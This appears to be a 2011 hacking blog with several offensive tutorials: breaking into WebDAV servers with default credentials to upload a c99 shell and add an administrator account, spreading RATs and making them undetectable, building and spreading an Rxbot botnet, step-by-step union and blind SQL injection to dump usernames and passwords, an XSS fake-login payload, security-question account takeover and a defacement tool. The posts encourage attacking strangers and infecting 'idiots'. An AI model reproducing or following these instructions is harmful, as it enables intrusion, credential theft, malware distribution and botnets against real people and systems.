D3xt0p Cr3w

Hack WebDAV & Deface

2011-12-14T02:43:00.000-08:00

Alright guy's today in this tutorial I'll be explaining how to use the webdav exploit. The link for the tools used for this tutorial can be found in the bottom of this tutorial. For those of you who do not know what a Webdav is here is the definition.

Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer-users to edit and manage files collaboratively on remote World Wide Web servers.

But fo our purpose we will be using it to exploit RDP's or the Remote Desktop Protocal. For a better understanding of these with RDP's they could range from Vp's to Dedi's to just plain old home Pc's, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available there are several posted throughout the forum and you can find them by simply using the search button located on the navbar. Now before being able to use the shell we have to find some vulnerable Ip's to gain access to for this we will be using the WebdavlinkCrawler which can be found in the webdav tools kit I have provided below here if you don't trust my download links simply don't download them it's that simple. Once you have managed to open the program you will be presented with this interface.

as you can see there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the start button and it will being to search for the Ip's with webdav in them. Once you have managed to gather some ip's like you see in the picture here

Now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your Ip's your going to want to click one so it's highlighted and the right click it you will be presented with a popup that looks like this

I have no idea what that actually means,(if someone would like to translate and tell me please feel free.) but what it is doing is copying all of the Ip's you have scanned. After you have scanned all of the Ip's your going to want to paste them in a new word document

once you have done so save it as something you can remember and put it in a convenient location. After you have saved your collected webdav Ip's in a word document your going to want to open the Ip Scanner in the folder. It will look like this

what your going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your ip's in place

your going to want to press the scan button what this is doing is now taking all of your Webdav Ip's and figuring out which one's are vulnerable to this particular exploit. The one's on the right are the ones it scanned and if you happen to get any in the middle those are the one's you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of Ip's. After you have managed to gather some ip's in the middle column and are ready to exploit the server you can just double check by going to the ip/webdav/ in your browser and Ip being one of the exploited ones you managed to get and your going to be looking for an index page that says Webdav Test page. After you have confirmed it is ready to go your going to want to open "map network drive" this can be found by either right clicking Network or my computer in the start menu.

what your going to want to click on is the hyperlink that reads " Connect to a website that you can use to store your document's and pictures. You will be presented with a screen all you have to do is click next. And the your going to want to click Choose a custom network location.

Now this is the important screen it should look like this

What you have to do is put the Ip/webdav in the text box and click next

you should then be prompted with a login box the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse it's folder's so what you have to do now is just drag and drop the shell.php in side the main directory

After doing so go to ip/webdav/shell.php it should look like the following

Feel free to use that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands

net localgroup administrators SUPPORT /Add

What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in?

Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D
2. I upload my RAT’s incase they try to take back there dedi.
3. Host a web IRC bot or Shell Booter
4. Store files or host websites or shells
5. Make a Botnet!

TOOLS

http://dl.dropbox.com/u/18083172/Webdav%20tools.rar

How to Cross Site Scripting (XSS)

2011-11-25T03:41:00.000-08:00

What is Cross Site Scripting?
Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.
In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme, however all XSS attacks follow this pattern, which is depicted in the diagram below.

A basic example of XSS is when a malicious user injects a script in a legitimate shopping site URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.

Site owners are always confident, but so are hackers!

Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. An online business project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS exploits. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.

The repercussions of XSS

Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.

Exploited XSS is commonly used to achieve the following malicious results:

Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user’s web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks

Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to obtain credit card details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the hacker. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.

XSS Attack Vectors

Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

A practical example of XSS on an Acunetix test site.

The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.

1. Load the following link in your browser: http://testasp.vulnweb.com/search.asp, you will notice that the page is a simple page with an input field for running a search

2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:

Please login with the form below before proceeding: <br><br>Please login with the form below before proceeding:

<form action="destination.asp"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form>

then simply hit the search button after inserting the code.

Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.

A hacker can also inject this code by passing it around via the browser’s address bar as follows:

http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput +type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E

This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.

Why wait to be hacked?

The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.

Remote Administration Tool (RAT) Guide

2011-11-23T03:22:00.000-08:00

Whats RAT?
A RAT is also a shortcut called Remote Administrator Tool. It is mostly used for malicious purposes, such as controlling PC’s, stealing victims data, deleting or editing some files. You can only infect someone by sending him file called Server and they need to click it.

How they work?
Some RATs can spread over P2P file sharing programs(uTorrent, Pirate Bay etc.), Messangers spams(MSN, Skype, AIM etc.).

Download?

Well you can find any type of RAT here, on sprawd-tutor.blogspot.com. To download. and you will find some links. Also, you can buy FUD private version of RAT: Albertino RAT, Medusa Rat, jRAT etc. Also you will need DNS host for your RAT.

How do I control server?
Once installed, RAT server can be controlled via RAT client. From IP list box you choose PC and connect.

What do I need to setup RAT?
Well, you will need Windows OS, open port & RAT. To forward your port scroll for tutorial link or click this URL.

How do I port forward?
Port forwarding is easy and important for RAT. Well, you need open port because RAT connects through open port and bypass firewall. Open your web browser and write your IP and connect to your rooter(write Username: Admin & Password: Admin), open port forward page and write port you want and your IP. Well that’s all you need to do and now you got open port.

How do I make my server FUD?
If you want to make your server FUD again, you will need crypter(you can find free FUD one here.). Also, you can hex edit your server, but be careful some servers can crash after hex editing, any way check out this cool tutorial How to make FUD with hex editing.

How do I remove server if I infect myself?
When you infect yourself, first what you going to do is to connect to your PC. Some RATs have function to uninstall servers, well you click that and you uninstall it. Well there is another way, download MalwareBytes’ Anti-Malware and scan whole computer for Trojan.

Legal or illegal?
Well some RATs are legal, and some are not. Legal are the one without backdoor left, and they have abillity to close connection anytime. Illegal are used for hacking and they can steal data(Credit Cards, Passwords, private data etc.).

Legal :

TeamViewer – Access any remote computer via Internet just like sitting in front of it – even through firewalls.
UltraVNC – Remote support software for on demand remote computer support. VNC.Specializing in Remote Computer Support, goto my pc, goto assist, Remote Maintenance
Ammyy Admin – Ammyy Admin is a highly reliable and very friendly tool for remote computer access. You can provide remote assistance, remote administration or remote
Mikogo – Mikogo is an Online Meeting, Web Conferencing & Remote Support tool where you can share your screen with 10 participants in real-time over the Web.

Illegal :

Spy-Net
Cerberus Rat
CyberGate Rat
SubSeven
Turkojan
ProRat

Download RAT :

Where and how do I spread?
There are few different ways to spread your server. You can spread on warez websites, P2P file sharing websites(uTorrent, Pirate bay etc.), YouTube etc. Well some people use custom made Auto-Spreaders programs to spread their server. But best and most effective way to spread is when you FUD your server.

Whats DNS host?
The Domain Name System (DNS) is a hierarchical naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participants. Most importantly, it translates domain names meaningful to humans into the numerical (binary) identifiers associated with networking equipment for the purpose of locating and addressing these devices worldwide.

What can RAT do?

• Manage files
• Control web browser(Change homepage, open site etc.)
• Get system informations(OS Version, AV name, Ram Memory, Computer name etc.)
• Get passwords, credit card numbers or private data etc.
• View and remote control desktop
• Record camera & sound
• Control mouse
• Delete, rename, download, upload or move files

What’s reverse Connection?
A reverse connection is usually used to bypass firewall restrictions on open ports. The most common way a reverse connection is used is to bypass firewall and Router security restrictions.

Whats direct connection?
A direct-connect RAT is a simple setup where the client connects to a single or multiple servers directly. Stable servers are multi-threaded, allowing for multiple clients to be connected, along with increased reliability.

Can I get traced when I rat somebody?
Yes and no. Depends on victim, it is really hard to remove infection or even trace a hacker. There are tools like WireShark, but it’s really hard to trace, because PC usually got over 300 connections. So don’t worry.

Direct connection:

[Client]
| [Client]
| /
| /
| /
| /
[Server]-----[Client]

How To Create And Compile Botnets To Autohack 1000ds of Systems

2011-11-22T22:36:00.000-08:00

In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:

Download

Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.

What is a botnet?

A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".

Depending on the source you used, the bot can do several things.

I myself have helped write one of the most advanced and secure bot sources out there.

(Off topic)

But once again depending on the source you can :

Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".

Once again depending on the bot it may be able to kill other fellow competeter bots.

Or even kill AV/FW apon startup.

Add itself to registry.

Open sites.

Open commands.

Cmd,

notepad,

html,

Anything is possible !

Theres the infected computers "bots" the attacker, the server, and the victim.

while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.
Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial

Here we go ladies and gentlemen
Follow the tutorial:

1. Setting up the C++ compilier : easy
Download : Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Server 2
Server 3 (Direct Download)

Serial Key :

Password :

2. Run setup.exe and install. Remember to input serial
3. Download and install the Service Pack 6 (60.8 mb)
4. After that Download and install: Windows SDK (1.2 mb)
Server 2
Server 3 (Direct Download)

Password :

2. Configuring the C++ compilier (easy)

1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB

4. Now put them in this order: (use up and down arrows)

3. Configuring your bot: (easy)

1. Download and unpack:

Rxbot 7.6 (212.3 kb)

Server 2

Server 3 (Direct Download)

2. You should see an Rxbot 7.6 folder

3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:

char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

4. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:

5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!

YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !

Command List :
Download Command List

Basics:

.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more

Download mIRC :
mIRC
Server 2
Server 3 (FTP)

How to secure your bots:

Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:

@update http://www.mybot.com/download/SMSPRO.exe 82

The http://mybot.com is your bot's download link and the 82 can be any number(s)

Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.

To secure your self:

It is fairly easy to secure your bots, here is how:

1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

This way no one besides you or another op can set the channel topic

Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.

Good IRC Servers:

I would recommend running your botnet on a private server.

If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all

[LIST] Hacked Streamyx Username / Password [LIST]

2011-11-22T03:33:00.000-08:00

List 1 :

List 2

SQL Injection [Manual]

2011-11-21T20:52:00.000-08:00

First of all: What is SQL injection?

A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website in order to dump the database content to the attacker. SQL injection is a code injection technique that exploits a security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
Using well designed query language interpreters can prevent SQL injections. In the wild, it has been noted that applications experience, on average, 71 attempts an hour. When under direct attack, some applications occasionally came under aggressive attacks and at their peak, were attacked 800-1300 times per hour.

1.SQL Injection (classic or error based or whatever you call it) big_smile

2.Blind SQL Injection (the harder part)

So let's start with some action big_smile

1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection smile

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/*
http://www.site.com/news.php?id=5 order by 2/*
http://www.site.com/news.php?id=5 order by 3/*
http://www.site.com/news.php?id=5 order by 4/*

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works smile

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --

it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it smile

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version big_smile

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good big_smile)

we know that table admin exists...

now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up smile

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice smile

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed usernameassword on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser big_smile

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... big_smile

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... big_smile

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together big_smile

for that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is userass:email from table users.

example: admin:hash:whatever@blabla.com

That's all in this part, now we can proceed on harder part smile

2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done big_smile

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it big_smile

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend smile

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one smile

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR big_smile

Hope you learned something from this paper.

Have FUN! (:

Credits :
Cat- Devilcode

Hacking using the "Forgot Your Password"

2011-11-21T19:57:00.000-08:00

This is the easiest to use by a normal hacker do his account of a trespass. Here all information and data collected will be dedicated to the process of returning the victim to guess the password security question (Secret Question) are usually not taken seriously by some individuals. Hackers enter all the data necessary to restore the password to the words and things that are easily available on the nature and behavior tingah victim either in terms of personality, hobbies and so on. Armed with the information obtained, the security question is often asked, such as date of birth, postcode and place of residence can be answered easily and thus can change the password of the victim. Although sometimes hackers can not answer the question correctly, they will try the next day because there are systems such as the Yahoo allows the user to enter 10 times after a failed attempt and making the system will block your account for 24 hours. So hackers will try to find the all the information that enables them to intrude into your personal account.

The Steps :

1. Find victim email :

2. Try "Forgot my Password"

3. Try Answer the Security Question :)
4. After you got the Email, Try reset the victim account .

Advanced Deface Page Creator

2011-11-21T19:09:00.000-08:00

A website defacement is an attack on a website that changes the visual appearance of the site or a webpage. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.
The most common method of defacement is using SQL Injections to log on to administrator accounts. Defacements usually consist of an entire page. This page usually includes the defacer's pseudonym or "Hacking Codename." Sometimes, the Website Defacer makes fun of the system administrator for failing to maintain server security. Most times, the defacement is harmless, however, it can sometimes be used as a distraction to cover up more sinister actions such as uploading malware or deleting essential files from the server.
A high-profile website defacement was carried out on the website of the company SCO Group following its assertion that Linux contained stolen code. The title of the page was changed from "Red Hat v. SCO" to "SCO vs World," with various satirical content following.

Features :

Choose Sitetitle
Write down some texts
Create an error
Fade-in a picture
Background music
Javascript box
Funny circle around the curser
Choose textcolor
Choose backgroundcolor
Hide Sourcecode

Download Link :

Advanced Deface Creator

[TUT] Deface via WebFolder [TUT]

2011-11-21T18:54:00.000-08:00

